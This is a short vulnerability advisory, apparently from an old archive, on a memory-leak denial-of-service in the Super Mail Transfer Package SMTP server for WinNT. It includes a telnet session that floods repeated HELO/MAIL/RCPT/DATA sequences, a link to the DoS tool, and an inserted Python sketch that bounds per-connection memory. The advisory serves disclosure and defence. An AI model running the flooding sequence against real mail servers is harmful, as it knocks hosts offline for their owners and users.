COMMAND
Super Mail Transfer Package (SMTP) Server
SYSTEMS AFFECTED
Super Mail Transfer Package (SMTP) Server for WinNT Version 1.9x
PROBLEM
USSR Labs found the following. A memory leak exists in the Super
Mail Transfer Package that may cause an NT host to stop functioning
and/or need to be rebooted. When you connect to the SMTP port, all
information you send to the system is stored in memory, and the
server supports multiple HELO / MAIL FROM / RCPT TO / DATA
sequences in the same connection. If you issue multiple HELO /
MAIL FROM / RCPT TO / DATA sequences in the same connection, the
memory may not be deallocated. This condition may cause the
computer to stop functioning the moment memory runs out. Example:
[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK
If you repeat these commands, all information passed to the server
will be stored in memory, hence the memory leak problem. [buffer]
is approx. 10000 characters.
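The condition above comes down to per-connection memory that grows with every repeated transaction. The following is an added example, not code from the vendor or from USSR Labs, of how a receiving server can bound it: release the message buffer after each DATA, cap the DATA size, and cap the number of messages per connection. The class name, the replay helper and both limit values are assumptions made for illustration.

```python
# Added example, not vendor code. Both limits are assumed values.
MAX_MESSAGE_BYTES = 64 * 1024   # cap on one DATA body
MAX_TRANSACTIONS = 20           # cap on messages per connection

class SessionGuard:
    """Tracks one SMTP connection and bounds the memory it can hold."""
    def __init__(self):
        self.in_data = self.oversize = self.closed = False
        self.body = bytearray()     # buffer for the message in progress
        self.transactions = 0

    def feed(self, line: bytes) -> str:
        """Process one line (CRLF stripped); return the reply, '' if none."""
        if self.closed:
            return ""
        if self.in_data:
            if line == b".":                    # end-of-DATA marker
                return self._end_of_message()
            if len(self.body) + len(line) + 2 > MAX_MESSAGE_BYTES:
                self.oversize = True
                self.body.clear()               # stop buffering, keep draining
            elif not self.oversize:
                self.body += line + b"\r\n"
            return ""
        if line.split(b" ", 1)[0].upper() == b"DATA":
            if self.transactions >= MAX_TRANSACTIONS:
                self.closed = True              # caller drops the socket
                return "421 Too many messages on this connection"
            self.in_data = True
            return "354 Send Mail Message Body; End with <CR><LF>.<CR><LF>"
        return "250 OK"     # HELO/MAIL/RCPT parsing is outside this sketch

    def _end_of_message(self) -> str:
        reply = "552 Message too large" if self.oversize else "250 OK"
        # A real server hands self.body to its queue here, then lets go of it.
        self.body = bytearray()                 # release after every message
        self.in_data = self.oversize = False
        self.transactions += 1
        return reply

def replay(guard, lines):
    """Feed lines to the guard; return (replies, peak buffered bytes)."""
    replies, peak = [], 0
    for ln in lines:
        reply = guard.feed(ln)
        peak = max(peak, len(guard.body))
        if reply:
            replies.append(reply)
    return replies, peak
```

With these limits, the memory one connection can hold never exceeds MAX_MESSAGE_BYTES, however many times the command sequence is repeated.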
Binary or source for this D.o.s:
http://www.ussrback.com/
Mimed version of it follows:
SOLUTION
The related problems are fixed in the next generation of SMTP,
called MsgCore/NT.